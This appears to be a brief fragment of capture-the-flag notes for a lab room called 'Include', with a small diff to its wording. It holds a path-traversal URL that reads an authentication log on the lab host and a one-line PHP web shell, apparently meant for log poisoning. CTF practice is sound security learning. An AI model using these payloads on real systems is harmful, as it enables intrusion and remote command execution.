Include

 http://include.thm:50000/profile.php?img=....//....//....//....//....//....//....//....//....//var/log/auth.log

-It is indeed getting logged
+It is indeed getting **`logged`** as expected.

 <?php echo shell_exec($_GET['cmd']); ?>